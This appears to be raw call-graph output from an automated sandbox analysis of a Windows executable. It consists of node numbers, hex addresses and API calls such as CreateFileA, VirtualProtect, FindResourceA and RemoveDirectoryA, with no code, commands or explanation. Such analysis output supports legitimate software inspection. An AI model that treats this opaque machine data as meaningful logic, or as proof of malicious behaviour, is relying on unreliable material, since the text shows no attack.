4 API calls 6080->6082 6081 403198 4 API calls 6083 406f47 RegCloseKey 6081->6083 6082->6084 6083->6059 6084->6081 6085 403278 18 API calls 6085->6086 6086->6080 6086->6084 6086->6085 6087 403420 18 API calls 6086->6087 6088 406eb0 RegQueryValueExA 6087->6088 6088->6079 6089 406ecc 6088->6089 6089->6084 6090 4034f0 18 API calls 6089->6090 6091 406f0e 6090->6091 6092 406f20 6091->6092 6094 403420 18 API calls 6091->6094 6093 4031e8 18 API calls 6092->6093 6093->6084 6094->6092 6137 406a58 6095->6137 6098 406d26 6100 406a58 19 API calls 6098->6100 6102 406d72 6098->6102 6101 406d36 6100->6101 6103 406d42 6101->6103 6106 406a34 21 API calls 6101->6106 6145 406888 6102->6145 6103->6102 6104 406d67 6103->6104 6107 406a58 19 API calls 6103->6107 6104->6102 6157 406cc8 GetWindowsDirectoryA 6104->6157 6106->6103 6110 406d5b 6107->6110 6110->6104 6113 406a34 21 API calls 6110->6113 6111 406638 19 API calls 6112 406d87 6111->6112 6114 40322c 4 API calls 6112->6114 6113->6104 6115 406d91 6114->6115 6116 4031b8 4 API calls 6115->6116 6117 406dab 6116->6117 6117->5979 6119 409244 6118->6119 6120 406638 19 API calls 6119->6120 6121 40925d 6120->6121 6122 40322c 4 API calls 6121->6122 6129 409268 6122->6129 6123 406978 20 API calls 6123->6129 6125 408dd8 18 API calls 6125->6129 6126 4033b4 18 API calls 6126->6129 6127 405890 18 API calls 6127->6129 6129->6123 6129->6125 6129->6126 6129->6127 6130 4092e4 6129->6130 6197 4091b0 6129->6197 6205 409034 6129->6205 6131 40322c 4 API calls 6130->6131 6132 4092ef 6131->6132 6133 4031b8 4 API calls 6132->6133 6134 409309 6133->6134 6135 403198 4 API calls 6134->6135 6136 409311 6135->6136 6136->5979 6138 4034f0 18 API calls 6137->6138 6139 406a6b 6138->6139 6140 406a82 GetEnvironmentVariableA 6139->6140 6144 406a95 6139->6144 6159 406dec 6139->6159 6140->6139 6141 406a8e 6140->6141 6142 403198 4 API calls 6141->6142 6142->6144 6144->6098 6154 406a34 6144->6154 6146 403414 6145->6146 6147 4068ab GetFullPathNameA 6146->6147 6148 4068b7 6147->6148 6149 4068ce 6147->6149 6148->6149 6151 4068bf 6148->6151 6150 40322c 4 API calls 6149->6150 6152 4068cc 6150->6152 6153 403278 18 API calls 6151->6153 6152->6111 6153->6152 6163 4069dc 6154->6163 6158 406ce9 6157->6158 6158->6102 6160 406dfa 6159->6160 6161 4034f0 18 API calls 6160->6161 6162 406e08 6161->6162 6162->6139 6170 406978 6163->6170 6165 4069fe 6166 406a06 GetFileAttributesA 6165->6166 6167 406a1b 6166->6167 6168 403198 4 API calls 6167->6168 6169 406a23 6168->6169 6169->6098 6180 406744 6170->6180 6172 4069b0 6175 4069c6 6172->6175 6176 4069bb 6172->6176 6174 406989 6174->6172 6187 406970 CharPrevA 6174->6187 6188 403454 6175->6188 6178 40322c 4 API calls 6176->6178 6179 4069c4 6178->6179 6179->6165 6181 406755 6180->6181 6182 4067b9 6181->6182 6186 406773 6181->6186 6183 406680 IsDBCSLeadByte 6182->6183 6184 4067b4 6182->6184 6183->6184 6184->6174 6186->6184 6195 406680 IsDBCSLeadByte 6186->6195 6187->6174 6189 403486 6188->6189 6190 403459 6188->6190 6191 403198 4 API calls 6189->6191 6190->6189 6193 40346d 6190->6193 6192 40347c 6191->6192 6192->6179 6194 403278 18 API calls 6193->6194 6194->6192 6196 406694 6195->6196 6196->6186 6198 403198 4 API calls 6197->6198 6200 4091d1 6198->6200 6202 4091fe 6200->6202 6214 4032a8 6200->6214 6217 403494 6200->6217 6203 403198 4 API calls 6202->6203 6204 409213 6203->6204 6204->6129 6206 408f70 2 API calls 6205->6206 6207 40904a 6206->6207 6208 40904e 6207->6208 6221 406a48 6207->6221 6208->6129 6211 409081 6212 408fac Wow64RevertWow64FsRedirection 6211->6212 6213 409089 6212->6213 6213->6129 6215 403278 18 API calls 6214->6215 6216 4032b5 6215->6216 6216->6200 6218 403498 6217->6218 6220 4034c3 6217->6220 6219 4034f0 18 API calls 6218->6219 6219->6220 6220->6200 6222 4069dc 21 API calls 6221->6222 6223 406a52 GetLastError 6222->6223 6223->6211 6225 406744 IsDBCSLeadByte 6224->6225 6227 406835 6225->6227 6226 40687f 6226->5993 6227->6226 6228 406680 IsDBCSLeadByte 6227->6228 6228->6227 6230 4068f3 6229->6230 6231 406820 IsDBCSLeadByte 6230->6231 6234 4068fe 6231->6234 6232 4066ea 6232->5998 6232->5999 6233 406680 IsDBCSLeadByte 6233->6234 6234->6232 6234->6233 6236 406957 6235->6236 6237 40695b 6235->6237 6236->6012 6240 406970 CharPrevA 6237->6240 6239 40696c 6239->6012 6240->6239 6815 408f30 6818 408dfc 6815->6818 6819 408e05 6818->6819 6820 403198 4 API calls 6819->6820 6821 408e13 6819->6821 6820->6819 6822 403932 6823 403924 6822->6823 6824 40374c VariantClear 6823->6824 6825 40392c 6824->6825 5385 4075c4 SetFilePointer 5386 4075f7 5385->5386 5387 4075e7 GetLastError 5385->5387 5387->5386 5388 4075f0 5387->5388 5390 40748c GetLastError 5388->5390 5393 4073ec 5390->5393 5394 407284 19 API calls 5393->5394 5395 407414 5394->5395 5396 407434 5395->5396 5398 405194 33 API calls 5395->5398 5397 405890 18 API calls 5396->5397 5399 407443 5397->5399 5398->5396 5400 403198 4 API calls 5399->5400 5401 407460 5400->5401 5401->5386 6416 4076c8 WriteFile 6417 4076e8 6416->6417 6420 4076ef 6416->6420 6418 40748c 35 API calls 6417->6418 6418->6420 6419 407700 6420->6419 6421 4073ec 34 API calls 6420->6421 6421->6419 6422 402ccc 6425 402cfe 6422->6425 6426 402cdd 6422->6426 6423 402d88 RtlUnwind 6424 403154 4 API calls 6423->6424 6424->6425 6426->6423 6426->6425 6427 402b28 RaiseException 6426->6427 6428 402d7f 6427->6428 6428->6423 6834 403fcd 6835 403f07 4 API calls 6834->6835 6836 403fd6 6835->6836 6837 403e9c 4 API calls 6836->6837 6838 403fe2 6837->6838 6435 4024d0 6436 4024e4 6435->6436 6437 4024e9 6435->6437 6440 401918 4 API calls 6436->6440 6438 402518 6437->6438 6439 40250e RtlEnterCriticalSection 6437->6439 6442 4024ed 6437->6442 6450 402300 6438->6450 6439->6438 6440->6437 6443 402525 6446 402581 6443->6446 6447 402577 RtlLeaveCriticalSection 6443->6447 6445 401fd4 14 API calls 6448 402531 6445->6448 6447->6446 6448->6443 6449 40215c 9 API calls 6448->6449 6449->6443 6451 402314 6450->6451 6453 4023b8 6451->6453 6454 402335 6451->6454 6452 402344 6452->6443 6452->6445 6453->6452 6455 401d80 9 API calls 6453->6455 6458 402455 6453->6458 6460 401e84 6453->6460 6454->6452 6456 401b74 9 API calls 6454->6456 6455->6453 6456->6452 6458->6452 6459 401d00 9 API calls 6458->6459 6459->6452 6465 401768 6460->6465 6462 401e99 6463 401ea6 6462->6463 6464 401dcc 9 API calls 6462->6464 6463->6453 6464->6463 6466 401787 6465->6466 6467 40183b 6466->6467 6468 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 6466->6468 6469 40132c LocalAlloc 6466->6469 6471 401821 6466->6471 6473 4017d6 6466->6473 6470 4015c4 VirtualAlloc 6467->6470 6474 4017e7 6467->6474 6468->6466 6469->6466 6470->6474 6472 40150c VirtualFree 6471->6472 6472->6474 6475 40150c VirtualFree 6473->6475 6474->6462 6475->6474 6476 4028d2 6477 4028da 6476->6477 6478 403554 4 API calls 6477->6478 6479 4028ef 6477->6479 6478->6477 6480 4025ac 4 API calls 6479->6480 6481 4028f4 6480->6481 6839 4019d3 6840 4019ba 6839->6840 6841 4019c3 RtlLeaveCriticalSection 6840->6841 6842 4019cd 6840->6842 6841->6842 5402 407fd4 5403 407fe6 5402->5403 5405 407fed 5402->5405 5413 407f10 5403->5413 5406 408021 5405->5406 5407 408015 5405->5407 5408 408017 5405->5408 5409 40804e 5406->5409 5411 407d7c 33 API calls 5406->5411 5427 407e2c 5407->5427 5424 407d7c 5408->5424 5411->5409 5414 407f25 5413->5414 5415 407d7c 33 API calls 5414->5415 5416 407f34 5414->5416 5415->5416 5417 407f6e 5416->5417 5419 407d7c 33 API calls 5416->5419 5418 407f82 5417->5418 5420 407d7c 33 API calls 5417->5420 5423 407fae 5418->5423 5434 407eb8 5418->5434 5419->5417 5420->5418 5423->5405 5437 4058c4 5424->5437 5426 407d9e 5426->5406 5428 405194 33 API calls 5427->5428 5429 407e57 5428->5429 5445 407de4 5429->5445 5431 407e5f 5432 403198 4 API calls 5431->5432 5433 407e74 5432->5433 5433->5406 5435 407ec7 VirtualFree 5434->5435 5436 407ed9 VirtualAlloc 5434->5436 5435->5436 5436->5423 5439 4058d0 5437->5439 5438 405194 33 API calls 5440 4058fd 5438->5440 5439->5438 5441 4031e8 18 API calls 5440->5441 5442 405908 5441->5442 5443 403198 4 API calls 5442->5443 5444 40591d 5443->5444 5444->5426 5446 4058c4 33 API calls 5445->5446 5447 407e06 5446->5447 5447->5431 6482 405ad4 6483 405ae4 6482->6483 6484 405adc 6482->6484 6485 405ae2 6484->6485 6486 405aeb 6484->6486 6489 405a4c 6485->6489 6487 405940 19 API calls 6486->6487 6487->6483 6490 405a54 6489->6490 6491 405a6e 6490->6491 6492 403154 4 API calls 6490->6492 6493 405a73 6491->6493 6494 405a8a 6491->6494 6492->6490 6495 405940 19 API calls 6493->6495 6496 403154 4 API calls 6494->6496 6497 405a86 6495->6497 6498 405a8f 6496->6498 6500 403154 4 API calls 6497->6500 6499 4059b0 33 API calls 6498->6499 6499->6497 6501 405ab8 6500->6501 6502 403154 4 API calls 6501->6502 6503 405ac6 6502->6503 6503->6483 5915 40a9de 5916 40aa03 5915->5916 5917 407918 InterlockedExchange 5916->5917 5918 40aa2d 5917->5918 5919 40aa3d 5918->5919 5920 409ae8 18 API calls 5918->5920 5925 4076ac SetEndOfFile 5919->5925 5920->5919 5922 40aa59 5923 4025ac 4 API calls 5922->5923 5924 40aa90 5923->5924 5926 4076c3 5925->5926 5927 4076bc 5925->5927 5926->5922 5928 40748c 35 API calls 5927->5928 5928->5926 6846 402be9 RaiseException 6847 402c04 6846->6847 6514 402af2 6515 402afe 6514->6515 6518 402ed0 6515->6518 6519 403154 4 API calls 6518->6519 6521 402ee0 6519->6521 6520 402b03 6521->6520 6523 402b0c 6521->6523 6524 402b25 6523->6524 6525 402b15 RaiseException 6523->6525 6524->6520 6525->6524 5453 40a5f8 5496 4030dc 5453->5496 5455 40a60e 5499 4042e8 5455->5499 5457 40a613 5502 40457c GetModuleHandleA GetProcAddress 5457->5502 5461 40a61d 5510 4065c8 5461->5510 5463 40a622 5519 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5463->5519 5470 40a665 5541 406c2c 5470->5541 5474 4031e8 18 API calls 5475 40a683 5474->5475 5555 4074e0 5475->5555 5480 407918 InterlockedExchange 5483 40a6d2 5480->5483 5482 40a710 5575 4074a0 5482->5575 5483->5482 5612 409ae8 5483->5612 5485 40a751 5579 407a28 5485->5579 5486 40a736 5486->5485 5487 409ae8 18 API calls 5486->5487 5487->5485 5489 40a776 5589 408b08 5489->5589 5493 40a7bc 5494 408b08 35 API calls 5493->5494 5495 40a7f5 5493->5495 5494->5493 5622 403094 5496->5622 5498 4030e1 GetModuleHandleA GetCommandLineA 5498->5455 5500 403154 4 API calls 5499->5500 5501 404323 5499->5501 5500->5501 5501->5457 5503 404598 5502->5503 5504 40459f GetProcAddress 5502->5504 5503->5504 5505 4045b5 GetProcAddress 5504->5505 5506 4045ae 5504->5506 5507 4045c4 SetProcessDEPPolicy 5505->5507 5508 4045c8 5505->5508 5506->5505 5507->5508 5509 404624 6FB81CD0 5508->5509 5509->5461 5623 405ca8 5510->5623 5520 4090f7 5519->5520 5707 406fa0 SetErrorMode 5520->5707 5523 407284 19 API calls 5524 409127 5523->5524 5525 403198 4 API calls 5524->5525 5526 40913c 5525->5526 5527 409b78 GetSystemInfo VirtualQuery 5526->5527 5528 409ba2 5527->5528 5529 409c2c 5527->5529 5528->5529 5530 409c0d VirtualQuery 5528->5530 5531 409bcc VirtualProtect 5528->5531 5532 409bfb VirtualProtect 5528->5532 5533 409768 5529->5533 5530->5528 5530->5529 5531->5528 5532->5530 5713 406bd0 GetCommandLineA 5533->5713 5535 409850 5536 4031b8 4 API calls 5535->5536 5538 40986a 5536->5538 5537 406c2c 20 API calls 5540 409785 5537->5540 5538->5470 5605 409c88 5538->5605 5539 403454 18 API calls 5539->5540 5540->5535 5540->5537 5540->5539 5542 406c53 GetModuleFileNameA 5541->5542 5543 406c77 GetCommandLineA 5541->5543 5544 403278 18 API calls 5542->5544 5551 406c7c 5543->5551 5545 406c75 5544->5545 5549 406ca4 5545->5549 5546 406c81 5547 403198 4 API calls 5546->5547 5550 406c89 5547->5550 5548 406af0 18 API calls 5548->5551 5552 403198 4 API calls 5549->5552 5553 40322c 4 API calls 5550->5553 5551->5546 5551->5548 5551->5550 5554 406cb9 5552->5554 5553->5549 5554->5474 5556 4074ea 5555->5556 5720 407576 5556->5720 5723 407578 5556->5723 5557 407516 5558 40752a 5557->5558 5559 40748c 35 API calls 5557->5559 5562 409c34 FindResourceA 5558->5562 5559->5558 5563 409c49 5562->5563 5564 409c4e SizeofResource 5562->5564 5565 409ae8 18 API calls 5563->5565 5566 409c60 LoadResource 5564->5566 5567 409c5b 5564->5567 5565->5564 5569 409c73 LockResource 5566->5569 5570 409c6e 5566->5570 5568 409ae8 18 API calls 5567->5568 5568->5566 5572 409c84 5569->5572 5573 409c7f 5569->5573 5571 409ae8 18 API calls 5570->5571 5571->5569 5572->5480 5572->5483 5574 409ae8 18 API calls 5573->5574 5574->5572 5577 4074b4 5575->5577 5576 4074c4 5576->5486 5577->5576 5578 4073ec 34 API calls 5577->5578 5578->5576 5580 407a35 5579->5580 5581 405890 18 API calls 5580->5581 5582 407a89 5580->5582 5581->5582 5583 407918 InterlockedExchange 5582->5583 5584 407a9b 5583->5584 5585 405890 18 API calls 5584->5585 5586 407ab1 5584->5586 5585->5586 5587 405890 18 API calls 5586->5587 5588 407af4 5586->5588 5587->5588 5588->5489 5591 408b39 5589->5591 5595 408b82 5589->5595 5590 408bcd 5726 407cb8 5590->5726 5593 4034f0 18 API calls 5591->5593 5591->5595 5598 403420 18 API calls 5591->5598 5599 4031e8 18 API calls 5591->5599 5603 407cb8 35 API calls 5591->5603 5593->5591 5594 408be4 5597 4031b8 4 API calls 5594->5597 5595->5590 5596 4034f0 18 API calls 5595->5596 5601 403420 18 API calls 5595->5601 5602 4031e8 18 API calls 5595->5602 5604 407cb8 35 API calls 5595->5604 5596->5595 5600 408bfe 5597->5600 5598->5591 5599->5591 5619 404c20 5600->5619 5601->5595 5602->5595 5603->5591 5604->5595 5606 40322c 4 API calls 5605->5606 5607 409cab 5606->5607 5608 409cba MessageBoxA 5607->5608 5609 409ccf 5608->5609 5610 403198 4 API calls 5609->5610 5611 409cd7 5610->5611 5611->5470 5613 409af1 5612->5613 5614 409b09 5612->5614 5616 405890 18 API calls 5613->5616 5615 405890 18 API calls 5614->5615 5617 409b1a 5615->5617 5618 409b03 5616->5618 5617->5482 5618->5482 5748 402594 5619->5748 5621 404c2b 5621->5493 5622->5498 5624 405940 19 API calls 5623->5624 5625 405cb9 5624->5625 5626 405280 GetSystemDefaultLCID 5625->5626 5630 4052b6 5626->5630 5627 404cdc 19 API calls 5627->5630 5628 40520c 19 API calls 5628->5630 5629 4031e8 18 API calls 5629->5630 5630->5627 5630->5628 5630->5629 5631 405318 5630->5631 5632 404cdc 19 API calls 5631->5632 5633 40520c 19 API calls 5631->5633 5634 4031e8 18 API calls 5631->5634 5635 40539b 5631->5635 5632->5631 5633->5631 5634->5631 5636 4031b8 4 API calls 5635->5636 5637 4053b5 5636->5637 5638 4053c4 GetSystemDefaultLCID 5637->5638 5695 40520c GetLocaleInfoA 5638->5695 5641 4031e8 18 API calls 5642 405404 5641->5642 5643 40520c 19 API calls 5642->5643 5644 405419 5643->5644 5645 40520c 19 API calls 5644->5645 5646 40543d 5645->5646 5701 405258 GetLocaleInfoA 5646->5701 5649 405258 GetLocaleInfoA 5650 40546d 5649->5650 5651 40520c 19 API calls 5650->5651 5652 405487 5651->5652 5653 405258 GetLocaleInfoA 5652->5653 5654 4054a4 5653->5654 5655 40520c 19 API calls 5654->5655 5656 4054be 5655->5656 5657 4031e8 18 API calls 5656->5657 5658 4054cb 5657->5658 5659 40520c 19 API calls 5658->5659 5660 4054e0 5659->5660 5661 4031e8 18 API calls 5660->5661 5662 4054ed 5661->5662 5663 405258 GetLocaleInfoA 5662->5663 5664 4054fb 5663->5664 5665 40520c 19 API calls 5664->5665 5666 405515 5665->5666 5667 4031e8 18 API calls 5666->5667 5668 405522 5667->5668 5669 40520c 19 API calls 5668->5669 5670 405537 5669->5670 5671 4031e8 18 API calls 5670->5671 5672 405544 5671->5672 5673 40520c 19 API calls 5672->5673 5674 405559 5673->5674 5675 405576 5674->5675 5676 405567 5674->5676 5678 40322c 4 API calls 5675->5678 5703 40322c 5676->5703 5679 405574 5678->5679 5680 40520c 19 API calls 5679->5680 5681 405598 5680->5681 5682 4055b5 5681->5682 5683 4055a6 5681->5683 5685 403198 4 API calls 5682->5685 5684 40322c 4 API calls 5683->5684 5686 4055b3 5684->5686 5685->5686 5687 4033b4 18 API calls 5686->5687 5688 4055d7 5687->5688 5689 4033b4 18 API calls 5688->5689 5690 4055f1 5689->5690 5691 4031b8 4 API calls 5690->5691 5692 40560b 5691->5692 5693 405cf4 GetVersionExA 5692->5693 5694 405d0b 5693->5694 5694->5463 5696 405233 5695->5696 5697 405245 5695->5697 5698 403278 18 API calls 5696->5698 5699 40322c 4 API calls 5697->5699 5700 405243 5698->5700 5699->5700 5700->5641 5702 405274 5701->5702 5702->5649 5705 403230 5703->5705 5704 403252 5704->5679 5705->5704 5706 4025ac 4 API calls 5705->5706 5706->5704 5711 403414 5707->5711 5710 406fee 5710->5523 5712 403418 LoadLibraryA 5711->5712 5712->5710 5714 406af0 18 API calls 5713->5714 5715 406bf3 5714->5715 5716 406af0 18 API calls 5715->5716 5717 406c05 5715->5717 5716->5715 5718 403198 4 API calls 5717->5718 5719 406c1a 5718->5719 5719->5540 5721 407578 5720->5721 5722 4075b7 CreateFileA 5721->5722 5722->5557 5724 403414 5723->5724 5725 4075b7 CreateFileA 5724->5725 5725->5557 5727 407cd3 5726->5727 5731 407cc8 5726->5731 5732 407c5c 5727->5732 5730 405890 18 API calls 5730->5731 5731->5594 5733 407c70 5732->5733 5734 407caf 5732->5734 5733->5734 5736 407bac 5733->5736 5734->5730 5734->5731 5737 407bb7 5736->5737 5738 407bc8 5736->5738 5739 405890 18 API calls 5737->5739 5740 4074a0 34 API calls 5738->5740 5739->5738 5741 407bdc 5740->5741 5742 4074a0 34 API calls 5741->5742 5743 407bfd 5742->5743 5744 407918 InterlockedExchange 5743->5744 5745 407c12 5744->5745 5746 407c28 5745->5746 5747 405890 18 API calls 5745->5747 5746->5733 5747->5746 5749 402598 5748->5749 5751 4025a2 5748->5751 5754 401fd4 5749->5754 5750 40259e 5750->5751 5752 403154 4 API calls 5750->5752 5751->5621 5751->5751 5752->5751 5755 401fe8 5754->5755 5756 401fed 5754->5756 5765 401918 RtlInitializeCriticalSection 5755->5765 5758 402012 RtlEnterCriticalSection 5756->5758 5759 40201c 5756->5759 5762 401ff1 5756->5762 5758->5759 5759->5762 5772 401ee0 5759->5772 5762->5750 5763 402147 5763->5750 5764 40213d RtlLeaveCriticalSection 5764->5763 5766 40193c RtlEnterCriticalSection 5765->5766 5767 401946 5765->5767 5766->5767 5768 401964 LocalAlloc 5767->5768 5769 40197e 5768->5769 5770 4019c3 RtlLeaveCriticalSection 5769->5770 5771 4019cd 5769->5771 5770->5771 5771->5756 5775 401ef0 5772->5775 5773 401f1c 5776 401f40 5773->5776 5783 401d00 5773->5783 5775->5773 5775->5776 5778 401e58 5775->5778 5776->5763 5776->5764 5787 4016d8 5778->5787 5781 401e75 5781->5775 5784 401d4e 5783->5784 5785 401d1e 5783->5785 5784->5785 5856 401c68 5784->5856 5785->5776 5790 4016f4 5787->5790 5789 4016fe 5812 4015c4 5789->5812 5790->5789 5794 40174f 5790->5794 5796 40175b 5790->5796 5804 401430 5790->5804 5816 40132c 5790->5816 5793 40170a 5793->5796 5820 40150c 5794->5820 5796->5781 5797 401dcc 5796->5797 5830 401d80 5797->5830 5800 40132c LocalAlloc 5801 401df0 5800->5801 5802 401df8 5801->5802 5834 401b44 5801->5834 5802->5781 5805 40143f VirtualAlloc 5804->5805 5807 40146c 5805->5807 5808 40148f 5805->5808 5824 4012e4 5807->5824 5808->5790 5811 40147c VirtualFree 5811->5808 5814 40160a 5812->5814 5813 40163a 5813->5793 5814->5813 5815 401626 VirtualAlloc 5814->5815 5815->5813 5815->5814 5817 401348 5816->5817 5818 4012e4 LocalAlloc 5817->5818 5819 40138f 5818->5819 5819->5790 5823 40153b 5820->5823 5821 401594 5821->5796 5822 401568 VirtualFree 5822->5823 5823->5821 5823->5822 5827 40128c 5824->5827 5828 401298 LocalAlloc 5827->5828 5829 4012aa 5827->5829 5828->5829 5829->5808 5829->5811 5831 401d92 5830->5831 5832 401d89 5830->5832 5831->5800 5832->5831 5839 401b74 5832->5839 5835 401b61 5834->5835 5836 401b52 5834->5836 5835->5802 5837 401d00 9 API calls 5836->5837 5838 401b5f 5837->5838 5838->5802 5842 40215c 5839->5842 5841 401b95 5841->5831 5843 40217a 5842->5843 5844 402175 5842->5844 5846 4021ab RtlEnterCriticalSection 5843->5846 5849 40217e 5843->5849 5852 4021b5 5843->5852 5845 401918 4 API calls 5844->5845 5845->5843 5846->5852 5847 4021c1 5850 4022e3 RtlLeaveCriticalSection 5847->5850 5851 4022ed 5847->5851 5848 402244 5848->5849 5853 401d80 7 API calls 5848->5853 5849->5841 5850->5851 5851->5841 5852->5847 5852->5848 5854 402270 5852->5854 5853->5849 5854->5847 5855 401d00 7 API calls 5854->5855 5855->5847 5857 401c7a 5856->5857 5858 401c9d 5857->5858 5859 401caf 5857->5859 5869 40188c 5858->5869 5861 40188c 3 API calls 5859->5861 5862 401cad 5861->5862 5863 401b44 9 API calls 5862->5863 5868 401cc5 5862->5868 5864 401cd4 5863->5864 5865 401cee 5864->5865 5879 401b98 5864->5879 5884 4013a0 5865->5884 5868->5785 5870 4018b2 5869->5870 5878 40190b 5869->5878 5888 401658 5870->5888 5873 40132c LocalAlloc 5874 4018cf 5873->5874 5875 4018e6 5874->5875 5876 40150c VirtualFree 5874->5876 5877 4013a0 LocalAlloc 5875->5877 5875->5878 5876->5875 5877->5878 5878->5862 5880 401b9d 5879->5880 5882 401bab 5879->5882 5881 401b74 9 API calls 5880->5881 5883 401baa 5881->5883 5882->5865 5883->5865 5885 4013ab 5884->5885 5886 4012e4 LocalAlloc 5885->5886 5887 4013c6 5885->5887 5886->5887 5887->5868 5890 40168f 5888->5890 5889 4016cf 5889->5873 5890->5889 5891 4016a9 VirtualFree 5890->5891 5891->5890 6848 402dfa 6849 402e26 6848->6849 6850 402e0d 6848->6850 6852 402ba4 6850->6852 6853 402bc9 6852->6853 6854 402bad 6852->6854 6853->6849 6855 402bb5 RaiseException 6854->6855 6855->6853 6856 4075fa GetFileSize 6857 407626 6856->6857 6858 407616 GetLastError 6856->6858 6858->6857 6859 40761f 6858->6859 6860 40748c 35 API calls 6859->6860 6860->6857 6861 406ffb 6862 407008 SetErrorMode 6861->6862 6530 403a80 CloseHandle 6531 403a90 6530->6531 6532 403a91 GetLastError 6530->6532 6533 404283 6534 4042c3 6533->6534 6535 403154 4 API calls 6534->6535 6536 404323 6535->6536 6863 404185 6864 4041ff 6863->6864 6865 403154 4 API calls 6864->6865 6866 4041cc 6864->6866 6867 404323 6865->6867 6537 403e87 6538 403e4c 6537->6538 6539 403e62 6538->6539 6540 403e7b 6538->6540 6541 403e67 6538->6541 6546 403cc8 6539->6546 6542 402674 4 API calls 6540->6542 6544 403e78 6541->6544 6550 402674 6541->6550 6542->6544 6547 403cd6 6546->6547 6548 402674 4 API calls 6547->6548 6549 403ceb 6547->6549 6548->6549 6549->6541 6551 403154 4 API calls 6550->6551 6552 40267a 6551->6552 6552->6544 6561 407e90 6562 407eb8 VirtualFree 6561->6562 6563 407e9d 6562->6563 6566 403e95 6567 403e4c 6566->6567 6568 403e62 6567->6568 6569 403e7b 6567->6569 6570 403e67 6567->6570 6572 403cc8 4 API calls 6568->6572 6571 402674 4 API calls 6569->6571 6573 403e78 6570->6573 6574 402674 4 API calls 6570->6574 6571->6573 6572->6570 6574->6573 6575 40ac97 6584 4096fc 6575->6584 6578 402f24 5 API calls 6579 40aca1 6578->6579 6580 403198 4 API calls 6579->6580 6581 40acc0 6580->6581 6582 403198 4 API calls 6581->6582 6583 40acc8 6582->6583 6593 4056ac 6584->6593 6586 409745 6589 403198 4 API calls 6586->6589 6587 409717 6587->6586 6599 40720c 6587->6599 6591 40975a 6589->6591 6590 409735 6592 40973d MessageBoxA 6590->6592 6591->6578 6591->6579 6592->6586 6594 403154 4 API calls 6593->6594 6595 4056b1 6594->6595 6596 4056c9 6595->6596 6597 403154 4 API calls 6595->6597 6596->6587 6598 4056bf 6597->6598 6598->6587 6600 4056ac 4 API calls 6599->6600 6601 40721b 6600->6601 6602 407221 6601->6602 6603 40722f 6601->6603 6604 40322c 4 API calls 6602->6604 6606 40724b 6603->6606 6607 40723f 6603->6607 6605 40722d 6604->6605 6605->6590 6617 4032b8 6606->6617 6610 4071d0 6607->6610 6611 40322c 4 API calls 6610->6611 6612 4071df 6611->6612 6613 4071fc 6612->6613 6614 406950 CharPrevA 6612->6614 6613->6605 6615 4071eb 6614->6615 6615->6613 6616 4032fc 18 API calls 6615->6616 6616->6613 6618 403278 18 API calls 6617->6618 6619 4032c2 6618->6619 6619->6605 6620 403a97 6621 403aac 6620->6621 6622 403bbc GetStdHandle 6621->6622 6623 403b0e CreateFileA 6621->6623 6624 403ab2 6621->6624 6625 403c17 GetLastError 6622->6625 6637 403bba 6622->6637 6623->6625 6626 403b2c 6623->6626 6625->6624 6628 403b3b GetFileSize 6626->6628 6626->6637 6628->6625 6629 403b4e SetFilePointer 6628->6629 6629->6625 6633 403b6a ReadFile 6629->6633 6630 403be7 GetFileType 6630->6624 6632 403c02 CloseHandle 6630->6632 6632->6624 6633->6625 6634 403b8c 6633->6634 6635 403b9f SetFilePointer 6634->6635 6634->6637 6635->6625 6636 403bb0 SetEndOfFile 6635->6636 6636->6625 6636->6637 6637->6624 6637->6630 6642 40aaa2 6643 40aad2 6642->6643 6644 40aadc CreateWindowExA SetWindowLongA 6643->6644 6645 405194 33 API calls 6644->6645 6646 40ab5f 6645->6646 6647 4032fc 18 API calls 6646->6647 6648 40ab6d 6647->6648 6649 4032fc 18 API calls 6648->6649 6650 40ab7a 6649->6650 6651 406b7c 19 API calls 6650->6651 6652 40ab86 6651->6652 6653 4032fc 18 API calls 6652->6653 6654 40ab8f 6653->6654 6655 4099ec 43 API calls 6654->6655 6656 40aba1 6655->6656 6657 4098cc 19 API calls 6656->6657 6658 40abb4 6656->6658 6657->6658 6659 40abed 6658->6659 6660 4094d8 9 API calls 6658->6660 6661 40ac06 6659->6661 6664 40ac00 RemoveDirectoryA 6659->6664 6660->6659 6662 40ac1a 6661->6662 6663 40ac0f DestroyWindow 6661->6663 6665 40ac42 6662->6665 6666 40357c 4 API calls 6662->6666 6663->6662 6664->6661 6667 40ac38 6666->6667 6668 4025ac 4 API calls 6667->6668 6668->6665 6880 405ba2 6882 405ba4 6880->6882 6881 405be0 6885 405940 19 API calls 6881->6885 6882->6881 6883 405bf7 6882->6883 6884 405bda 6882->6884 6888 404cdc 19 API calls 6883->6888 6884->6881 6886 405c4c 6884->6886 6893 405bf3 6885->6893 6887 4059b0 33 API calls 6886->6887 6887->6893 6889 405c20 6888->6889 6892 4059b0 33 API calls 6889->6892 6890 403198 4 API calls 6891 405c86 6890->6891 6892->6893 6893->6890 6894 408da4 6895 408dc8 6894->6895 6896 408c80 18 API calls 6895->6896 6897 408dd1 6896->6897 6669 402caa 6670 403154 4 API calls 6669->6670 6671 402caf 6670->6671 6912 4011aa 6913 4011ac GetStdHandle 6912->6913 6672 4028ac 6673 402594 18 API calls 6672->6673 6674 4028b6 6673->6674 4984 40aab4 4985 40aab8 SetLastError 4984->4985 5016 409648 GetLastError 4985->5016 4989 40aad2 4990 40aadc CreateWindowExA SetWindowLongA 4989->4990 5029 405194 4990->5029 4994 40ab6d 4995 4032fc 18 API calls 4994->4995 4996 40ab7a 4995->4996 5046 406b7c GetCommandLineA 4996->5046 4999 4032fc 18 API calls 5000 40ab8f 4999->5000 5051 4099ec 5000->5051 5002 40aba1 5004 40abb4 5002->5004 5072 4098cc 5002->5072 5005 40abd4 5004->5005 5006 40abed 5004->5006 5078 4094d8 5005->5078 5008 40ac06 5006->5008 5011 40ac00 RemoveDirectoryA 5006->5011 5009 40ac1a 5008->5009 5010 40ac0f DestroyWindow 5008->5010 5015 40ac42 5009->5015 5086 40357c 5009->5086 5010->5009 5011->5008 5013 40ac38 5099 4025ac 5013->5099 5103 404c94 5016->5103 5024 4096c3 5118 4031b8 5024->5118 5030 4051a8 33 API calls 5029->5030 5031 4051a3 5030->5031 5032 4032fc 5031->5032 5033 403300 5032->5033 5034 40333f 5032->5034 5035 4031e8 5033->5035 5036 40330a 5033->5036 5034->4994 5042 403254 18 API calls 5035->5042 5043 4031fc 5035->5043 5037 403334 5036->5037 5038 40331d 5036->5038 5039 4034f0 18 API calls 5037->5039 5279 4034f0 5038->5279 5045 403322 5039->5045 5040 403228 5040->4994 5042->5043 